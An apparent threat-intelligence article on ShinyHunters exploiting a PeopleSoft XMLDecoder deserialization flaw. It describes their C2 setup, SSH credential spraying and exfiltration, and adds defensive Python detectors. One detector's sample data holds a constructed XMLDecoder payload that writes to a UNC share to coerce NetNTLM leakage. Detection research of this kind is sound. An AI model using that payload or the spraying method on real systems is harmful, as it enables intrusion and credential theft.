Oracle PeopleSoft Vulnerability CVE-2026-35273 Exploited by ShinyHunters

A critical cyber threat has sent shockwaves through the enterprise security landscape. Over the past several weeks, the notorious digital extortion syndicate known as ShinyHunters has aggressively weaponized a critical, previously unpatched Oracle PeopleSoft vulnerability to infiltrate network infrastructures, compromise massive datasets, and orchestrate high-stakes extortion campaigns against dozens of organizations worldwide. Classified as CVE-2026-35273, the zero-day flaw represents one of the most severe enterprise software security crises in recent memory, carrying a near-maximum CVSS severity score of 9.8. From May 27, 2026, to June 9, 2026, the attackers operated in total stealth, catching many institutions completely unprepared before Oracle released an emergency out-of-band advisory.

A joint threat brief compiled by Google Cloud’s Mandiant and the Google Threat Intelligence Group (GTIG) has illuminated the sheer scale of the offensive. According to investigators, the threat group—tracked analytically by security firms as UNC6240—focused its efforts primarily on educational institutions. Out of more than 100 global organizations identified as compromised or highly vulnerable, an astonishing 68 percent operate within the higher education sector. High-profile institutions, including the United Kingdom’s University of Nottingham, have already confirmed major data breaches stemming from this exploitation campaign, highlighting the severe real-world consequences of unpatched Enterprise Resource Planning (ERP) flaws.

Dissecting the Critical Oracle PeopleSoft Vulnerability (CVE-2026-35273)

To understand the impact of this campaign, one must examine the technical mechanics of the Oracle PeopleSoft vulnerability. The flaw lies within the “Updates Environment Management” component of Oracle PeopleSoft and is reachable through the HTTP endpoints exposed by the Environment Management Hub (PSEMHUB). Under normal operational circumstances, PSEMHUB acts as a centralized administrative utility that coordinates software updates, configuration tasks, and agent monitoring across an organization’s PeopleSoft environment.

The severity of this vulnerability stems from several key architectural factors:

  • Zero Authentication Required: An attacker does not need legitimate credentials, an active session, or any level of initial privilege to exploit the flaw; it is a pre-authentication vulnerability.
  • Remote Exploitation Over HTTP: The exploit is delivered over standard HTTP or HTTPS. If a PSEMHUB endpoint is exposed to the public internet, it can be compromised from anywhere.
  • No User Interaction: No phishing email must be clicked and no administrative session must be hijacked; the payload is sent directly to the listening web service.
  • Maximum Severity Impact: A successful exploit grants remote code execution (RCE) on the host running the PeopleSoft Enterprise PeopleTools web tier, with the privileges of the service account under which that web tier runs.

The vulnerability primarily affects Oracle PeopleSoft Enterprise PeopleTools versions 8.61 and 8.62. Crucially, threat intelligence firms warn that legacy, unsupported versions of the software suite are also highly likely to be vulnerable, leaving organizations that run outdated ERP software in a state of extreme exposure. Behind the scenes, the exploit payload abuses XMLDecoder deserialization: an XML document handed to java.beans.XMLDecoder can instantiate arbitrary classes, so the attacker can write arbitrary files to the web tier or, on Windows hosts, coerce the server into an outbound SMB connection (TCP port 445) to an attacker-controlled share, leaking the machine account’s NetNTLM authentication hash. Because PeopleSoft applications run on Java-based Oracle WebLogic application servers, a deserialization flaw of this kind gives the attacker code execution in the web tier itself; on hosts where the WebLogic service account runs as root or a local administrator, that amounts to full control of the system.
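A defender-side illustration of the deserialization vector described above, added to this article rather than taken from Oracle, Mandiant or GTIG: a small Python request inspector that flags XMLDecoder-style payloads aimed at the PSEMHUB and integration gateway paths. The request samples and the exact path prefixes are constructed assumptions; the Java class names are the standard ones such a payload has to instantiate to write a file or spawn a process, and the UNC-path check captures the SMB coercion pattern.

```python
"""Flag XMLDecoder-style payloads in requests to PeopleSoft web-tier endpoints.

Illustrative detection logic written for this article, not Oracle, Mandiant
or GTIG code. The request samples are constructed; the watched paths are the
ones the article names (assumed to be request-path prefixes); the Java class
names are the standard ones any XMLDecoder payload must instantiate to write
a file or spawn a process.
"""
import re
import xml.etree.ElementTree as ET  # fine for constructed input; use defusedxml on live traffic

# Exposure surface named in the article (assumed to be the request-path prefixes).
WATCHED_PATHS = ("/PSEMHUB/hub", "/PSIGW/HttpListeningConnector")

# Classes a benign hub request never needs but an XMLDecoder payload relies on.
DANGEROUS_CLASSES = {
    "java.io.FileOutputStream",
    "java.io.PrintWriter",
    "java.lang.ProcessBuilder",
    "java.lang.Runtime",
    "java.net.URL",
}

# \\host\share in a file path makes a Windows host authenticate to that share
# over SMB, which is the NetNTLM-leak pattern described in the text.
UNC_PATH = re.compile(r"\\\\[A-Za-z0-9.-]+\\")


def inspect_request(path: str, body: str) -> list:
    """Return findings for one request; an empty list means nothing suspicious."""
    findings = []
    if not path.startswith(WATCHED_PATHS):
        return findings
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return findings  # not XML at all; other detectors apply
    # XMLDecoder documents use a <java> root, but payloads are sometimes wrapped
    # in a SOAP envelope, so walk the whole tree instead of checking the root only.
    for node in root.iter():
        tag = node.tag.rsplit("}", 1)[-1]  # strip any namespace prefix
        if tag == "java":
            findings.append("XMLDecoder <java> element in request body")
        cls = node.get("class")
        if cls in DANGEROUS_CLASSES:
            findings.append(f"XMLDecoder instantiates {cls}")
        if node.text and UNC_PATH.search(node.text):
            findings.append(f"UNC path in payload (SMB coercion): {node.text.strip()}")
    return findings


def scan_requests(requests):
    """Return (path, findings) for every suspicious (path, body) pair."""
    hits = []
    for path, body in requests:
        findings = inspect_request(path, body)
        if findings:
            hits.append((path, findings))
    return hits


# Constructed samples: a benign hub request and an XMLDecoder file-write payload
# whose target path is a UNC share, the shape that triggers outbound SMB.
BENIGN_BODY = "<request><action>status</action></request>"
MALICIOUS_BODY = """\
<java version="1.8" class="java.beans.XMLDecoder">
  <object class="java.io.FileOutputStream">
    <string>\\\\10.0.0.5\\share\\probe.txt</string>
  </object>
</java>
"""
CONSTRUCTED_REQUESTS = [
    ("/PSEMHUB/hub", BENIGN_BODY),
    ("/PSEMHUB/hub", MALICIOUS_BODY),
    ("/psp/ps/signon.html", MALICIOUS_BODY),  # outside the watched paths for this rule
]

if __name__ == "__main__":
    for path, findings in scan_requests(CONSTRUCTED_REQUESTS):
        print(path, findings)
```

The rule is coarse by design: a legitimate hub request has no reason to carry a <java> element or to name java.io.FileOutputStream, so any hit deserves a look, and the UNC check fires on exactly the path shape that makes a Windows host authenticate outbound over port 445.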

The Staging Ground Exposed: How OpSec Failures Revealed the Playbook

While UNC6240 operated with a high degree of technical coordination, the campaign’s full operational mechanics were laid bare due to a critical operational security (OpSec) failure. In early June 2026, security researcher @nahamike01 (Michael R.) publicly flagged open directories exposed on the internet by the threat actors. This discovery allowed GTIG and Mandiant to conduct an immediate, forensic triage of the attackers’ active staging infrastructure.

The investigation revealed that the attackers were hosting their payload toolkits across five sequential IP addresses:

  • 142.11.200.186
  • 142.11.200.187
  • 142.11.200.188
  • 142.11.200.189
  • 142.11.200.190

On each of these five staging servers, the threat actors ran an instance of Python’s built-in SimpleHTTPServer (the http.server module) on port 8888. Because that module lists directory contents by default when no index file is present, analysts could inspect everything staged there. Among the staged payloads was a shared, identical .bash_history file. This command history acted as an unobstructed chronological log, giving investigators the exact timeline and commands used to establish the attackers’ command-and-control (C2) infrastructure.

According to the logged timelines, the threat actors established their staging environments on May 27, 2026, at precisely 22:14 UTC. The first step was the installation of MeshCentral version 1.1.59, an open-source remote monitoring and management platform. Just eleven minutes later, at 22:25 UTC, the attackers executed the acme-client npm package, which automated the issuance of valid Let’s Encrypt TLS certificates for their chosen domain, azurenetfiles.net. By using certificates that browsers and proxies already trust, the threat actors ensured that their C2 traffic would blend into ordinary encrypted corporate web traffic without triggering certificate warnings.
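As an added example (not the investigators’ tooling), the following Python script shows how a timestamped .bash_history like the one recovered from the staging servers can be turned into a dated timeline. It assumes the shell had HISTTIMEFORMAT set so that bash stored a “#<epoch>” line before each command; the history content is constructed to mirror the two dated events above and is not the recovered file.

```python
"""Rebuild a C2 setup timeline from a timestamped .bash_history.

Illustrative forensics helper written for this article, not GTIG/Mandiant
tooling. It assumes the attackers' shell had HISTTIMEFORMAT set, so bash wrote
a '#<epoch>' line before each command. The history below is constructed to
mirror the two events the article dates (MeshCentral at 22:14 UTC, acme-client
at 22:25 UTC on May 27, 2026) and is not the recovered file.
"""
from datetime import datetime, timezone

SAMPLE_HISTORY = """\
#1779920040
npm install meshcentral@1.1.59
#1779920040
node node_modules/meshcentral
#1779920700
npm install acme-client
#1779920700
node issue-cert.js azurenetfiles.net
#1779921000
python3 -m http.server 8888
"""

# Command substrings that mark stages of C2 setup (assumed indicators, matched case-insensitively).
INDICATORS = {
    "rmm-install": ("meshcentral", "meshagent"),
    "cert-issuance": ("acme-client", "acme.sh", "certbot"),
    "stager": ("http.server", "simplehttpserver"),
}
ISO = "%Y-%m-%dT%H:%M:%SZ"


def parse_history(text):
    """Yield (utc datetime or None, command) pairs in file order."""
    stamp = None
    for line in text.splitlines():
        if line.startswith("#") and line[1:].isdigit():
            stamp = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
        elif line.strip():
            yield stamp, line  # a multi-line command shares the preceding stamp


def classify(command):
    """Return the indicator categories a command matches."""
    low = command.lower()
    return [cat for cat, needles in INDICATORS.items() if any(n in low for n in needles)]


def timeline(text):
    """Return flagged commands as (iso_utc, category, command) tuples in file order."""
    events = []
    for stamp, cmd in parse_history(text):
        when = stamp.strftime(ISO) if stamp else "unknown"
        for cat in classify(cmd):
            events.append((when, cat, cmd))
    return events


def gap_minutes(events, first_cat, second_cat):
    """Minutes between the first dated event of each category; None if either is missing."""
    firsts = {}
    for when, cat, _ in events:
        if when != "unknown":
            firsts.setdefault(cat, when)
    if first_cat not in firsts or second_cat not in firsts:
        return None
    delta = datetime.strptime(firsts[second_cat], ISO) - datetime.strptime(firsts[first_cat], ISO)
    return int(delta.total_seconds() // 60)


if __name__ == "__main__":
    evts = timeline(SAMPLE_HISTORY)
    for e in evts:
        print(*e)
    print("install-to-cert gap (min):", gap_minutes(evts, "rmm-install", "cert-issuance"))
```

Without HISTTIMEFORMAT the file carries only command order, so the same parser still yields the sequence but every event is reported as “unknown” and the gap calculation returns None rather than guessing.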

Advanced C2 Masquerading and In-Network Reconnaissance

The staging directories hosted highly customized MeshCentral agents pre-configured to communicate with the C2 endpoint over WebSockets via the address wss://azurenetfiles.net:443/agent.ashx. The domain azurenetfiles.net was strategically selected to mimic legitimate Microsoft Azure NetApp Files services, a sophisticated masquerading technique designed to deceive network administrators reviewing DNS logs.

To evade endpoint detection and response (EDR) platforms, the Windows agents were renamed to suggest legitimate Azure operations tooling:

  • meshagent32-azure-ops.exe
  • meshagent64-azure-ops.exe
  • meshagent64-v2.exe

For Linux environments, the attackers hosted an unconfigured Linux MeshCentral agent binary and supplied the server address and other settings on the command line, so the C2 details were not embedded in the file for static signatures to match. Once initial access was secured via the unauthenticated HTTP exploit against PSEMHUB, the threat actors performed targeted internal reconnaissance using MeshCentral’s command-line tool, meshctrl.js.

The abuse of legitimate Remote Monitoring and Management (RMM) utilities like MeshCentral represents a growing trend known as “Bring Your Own Land” (BYOL). By deploying legitimate, signed administration tools rather than custom compiled malware, the threat actors successfully bypassed traditional antivirus defenses. Once active on the compromised host, they used meshctrl.js to perform a highly systematic auditing process, mapping out the internal network by:

  1. Parsing the local /etc/hosts files to identify neighboring servers.
  2. Inspecting WebLogic config.xml files to locate active database connections and application structures.
  3. Reading PeopleSoft application server configurations (specifically psappsrv.cfg) to extract domain details and system accounts.
  4. Enumerating active Network File System (NFS) storage locations to identify directories containing sensitive student, payroll, and corporate data.

Lateral Movement and Industrial-Scale Extortion

Once UNC6240 mapped out the surrounding environment, they moved rapidly to compromise adjacent systems. Rather than performing manual pivots, the attackers automated their lateral movement by deploying a customized Bash script named [victim_abbreviation]_fanout.sh directly to the /tmp directory of compromised hosts.

This script acted as a localized credential-spraying engine. It took the list of internal IP addresses and hostnames harvested from /etc/hosts and attempted automated SSH logins using a hardcoded array of common administrative credentials (targeting accounts such as psoft, oracle, and linuxadm). When a login succeeded, the script recorded host and account details, established persistent access, and dropped a ransom marker file named README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT into critical WebLogic and Process Scheduler directories.
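The fanout script’s behaviour leaves a characteristic pattern in sshd logs on every host it touches: a quick run of failed password logins for several service accounts from one internal source, followed by a success. The Python detector below, added here as an example rather than taken from the brief, finds that pattern in constructed OpenSSH auth.log lines; the year (syslog omits it), the thresholds and the time window are assumptions to tune per environment.

```python
"""Detect the fanout-style SSH credential spray in sshd authentication logs.

Illustrative detection logic written for this article, not Mandiant/GTIG or
victim tooling. The auth.log lines are constructed in standard OpenSSH syslog
format; the year is assumed (syslog omits it); thresholds and window are
assumptions to tune per environment.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)
WINDOW = timedelta(seconds=120)   # spray bursts are fast; tune to the environment
MIN_FAILURES = 3
MIN_USERS = 2
SERVICE_ACCOUNTS = {"psoft", "oracle", "linuxadm"}  # accounts the article says the script targeted

SAMPLE_AUTH_LOG = """\
Jun  2 03:14:07 psapp02 sshd[4121]: Failed password for psoft from 10.20.1.15 port 51022 ssh2
Jun  2 03:14:09 psapp02 sshd[4123]: Failed password for oracle from 10.20.1.15 port 51024 ssh2
Jun  2 03:14:11 psapp02 sshd[4125]: Failed password for invalid user linuxadm from 10.20.1.15 port 51026 ssh2
Jun  2 03:14:13 psapp02 sshd[4127]: Accepted password for psoft from 10.20.1.15 port 51028 ssh2
Jun  2 03:20:45 psapp02 sshd[4200]: Accepted publickey for deploy from 10.20.9.2 port 40011 ssh2
Jun  2 03:22:10 psapp02 sshd[4210]: Failed password for deploy from 10.20.9.2 port 40013 ssh2
"""


def parse(lines, year=2026):
    """Yield (timestamp, host, result, user, src) for each sshd auth line."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["host"], m["result"], m["user"], m["src"]


def detect_spray(lines):
    """One finding per source that fails MIN_FAILURES logins across MIN_USERS accounts within WINDOW."""
    by_src = defaultdict(list)
    for ev in parse(lines):
        by_src[ev[4]].append(ev)
    findings = []
    for src, events in by_src.items():
        events.sort()  # tuples sort by timestamp first
        failures = [e for e in events if e[2] == "Failed"]
        for i, first in enumerate(failures):
            burst = [e for e in failures[i:] if e[0] - first[0] <= WINDOW]
            users = {e[3] for e in burst}
            if len(burst) >= MIN_FAILURES and len(users) >= MIN_USERS:
                accepted = sorted({e[3] for e in events if e[2] == "Accepted" and e[0] >= first[0]})
                findings.append({
                    "source": src,
                    "host": first[1],
                    "attempts": len(burst),
                    "failed_users": sorted(users),
                    "accepted_as": accepted,  # a success after the burst means the spray landed
                    "service_accounts_hit": sorted(users & SERVICE_ACCOUNTS),
                })
                break  # one finding per source is enough for triage
    return findings


if __name__ == "__main__":
    for finding in detect_spray(SAMPLE_AUTH_LOG.splitlines()):
        print(finding)
```

The single failed login from the jump host 10.20.9.2 is deliberately left in the sample to show that an isolated typo does not trip the rule; the “accepted_as” field is the one to act on first, because it names the account the script went on to use for persistence.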

With administrative access secured across multiple nodes, the threat actors began systematic data exfiltration. To reduce bandwidth and speed up transfer, stolen files were compressed on the fly with zstd. The compressed archives were then pushed over outbound SSH connections to systems controlled by the group, including the IP addresses 176.120.22.24 and 108.174.202.99.

By June 9, 2026, the exfiltration phase transitioned into active extortion. ShinyHunters began posting the names of targeted institutions on their dark web Data Leak Site (DLS). The University of Nottingham was among the first publicly confirmed victims. A spokesperson for the university admitted that a “significant amount of student data” had been accessed, with reports indicating that 40 gigabytes of personal directories, student records, billing logs, and academic documentation had been stolen and subsequently leaked online after the university declined to negotiate. For educational institutions, breaches of this magnitude trigger severe regulatory concerns, including potential violations of the UK/EU General Data Protection Regulation (GDPR) and the Family Educational Rights and Privacy Act (FERPA) in the United States, carrying massive financial penalties and reputational damage.

Emergency Mitigations and the CISA KEV Mandate

The swift escalation of this campaign prompted immediate intervention from federal cyber authorities. On June 12, 2026, the Cybersecurity and Infrastructure Security Agency (CISA) officially added CVE-2026-35273 to its Known Exploited Vulnerabilities (KEV) Catalog, noting that the vulnerability has also been adopted by active ransomware operations. Under Binding Operational Directive (BOD) 26-04, all Federal Civilian Executive Branch (FCEB) agencies have been ordered to apply strict mitigations or entirely disable vulnerable services by June 15, 2026.

Because Oracle has so far published mitigation guidance rather than a broadly available out-of-band patch, the burden of defense falls heavily on system administrators. Organizations running PeopleSoft Enterprise PeopleTools versions 8.61 or 8.62 must act immediately to reduce their attack surface.

The following emergency mitigation steps are strongly recommended by security experts:

  • Restrict Endpoint Exposure: Immediately block external, internet-exposed access to all PSEMHUB and integration gateway endpoints. Ensure that paths like /PSEMHUB/hub and /PSIGW/HttpListeningConnector are only accessible via internal corporate networks or secure Virtual Private Networks (VPNs).
  • Audit the Filesystem: Review the local PeopleSoft web-tier directories for unauthorized files. Specifically, search for unexpected assets under /webserv/[domain]/applications/peoplesoft/PSEMHUB.war/ and check for abnormal directories (such as logs, persistentstorage, or scratchpad) under the transaction paths.
  • Monitor Outbound Traffic: Inspect firewall logs and network flow data for unauthorized outbound SMB connections (TCP port 445) originating from PeopleSoft servers, which attackers use to harvest system NetNTLM hashes. Similarly, monitor for outbound SSH connections to known malicious IPs.
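Both the SSH exfiltration described in the lateral movement section and the outbound-traffic monitoring recommended above come down to the same question: which connections should a PeopleSoft host never originate? The Python script below, added to this article and not taken from Oracle or the Mandiant/GTIG brief, applies those checks to constructed NetFlow-style records. The PeopleSoft host addresses, the SSH allowlist and the volume threshold are assumptions; the two destination IPs are the ones reported above.

```python
"""Flag outbound SMB and non-allowlisted SSH from the PeopleSoft tier in flow records.

Illustrative detection logic written for this article, not vendor or
Mandiant/GTIG code. The flow records, PeopleSoft host addresses, SSH allowlist
and volume threshold are constructed assumptions; the two exfiltration IPs are
the ones the article reports.
"""
import csv
import io
import ipaddress

PEOPLESOFT_HOSTS = {"10.20.1.10", "10.20.1.11"}            # constructed web/app tier addresses
SSH_ALLOWLIST = {"10.20.9.2"}                               # assumed jump host
REPORTED_EXFIL_IPS = {"176.120.22.24", "108.174.202.99"}   # from the Mandiant/GTIG brief
LARGE_TRANSFER_BYTES = 1_000_000_000                       # 1 GB; tune per environment

# Constructed flow export: ts,src,dst,dport,proto,bytes
SAMPLE_FLOWS = """\
ts,src,dst,dport,proto,bytes
2026-06-03T01:12:44Z,10.20.1.10,10.20.9.2,22,tcp,5120
2026-06-03T01:15:02Z,10.20.1.10,198.51.100.23,445,tcp,3200
2026-06-03T02:40:19Z,10.20.1.11,176.120.22.24,22,tcp,41200000000
2026-06-03T02:41:00Z,10.20.1.11,10.20.2.30,1521,tcp,880000
2026-06-03T03:05:10Z,10.20.5.7,108.174.202.99,22,tcp,2000
"""


def classify_flow(row):
    """Return the reasons one flow record is suspicious; an empty list means none."""
    reasons = []
    dst = ipaddress.ip_address(row["dst"])
    dport = int(row["dport"])
    nbytes = int(row["bytes"])
    # Rule 1: destinations the campaign is reported to use, from any source.
    if row["dst"] in REPORTED_EXFIL_IPS:
        reasons.append("destination matches reported exfiltration IP")
    if row["src"] not in PEOPLESOFT_HOSTS:
        return reasons
    # Rule 2: a PeopleSoft web/app host has no business opening SMB to anyone.
    if row["proto"] == "tcp" and dport == 445:
        reasons.append("outbound SMB from PeopleSoft host (NetNTLM hash coercion)")
    # Rule 3: SSH out of the tier is only expected to the jump host.
    if row["proto"] == "tcp" and dport == 22 and row["dst"] not in SSH_ALLOWLIST:
        reasons.append("outbound SSH to non-allowlisted destination")
        if dst.is_global and nbytes >= LARGE_TRANSFER_BYTES:
            reasons.append(f"large transfer to external host ({nbytes} bytes)")
    return reasons


def scan_flows(text):
    """Return (ts, src, dst, reasons) for every suspicious record in CSV flow data."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        reasons = classify_flow(row)
        if reasons:
            findings.append((row["ts"], row["src"], row["dst"], reasons))
    return findings


if __name__ == "__main__":
    for ts, src, dst, reasons in scan_flows(SAMPLE_FLOWS):
        print(ts, src, "->", dst, "; ".join(reasons))
```

The SMB rule fires regardless of volume, since a single 445 connection is enough to leak a NetNTLM hash, while the SSH rule only escalates to “large transfer” when the destination is a public address, which is the combination that matches the zstd-over-SSH exfiltration described earlier.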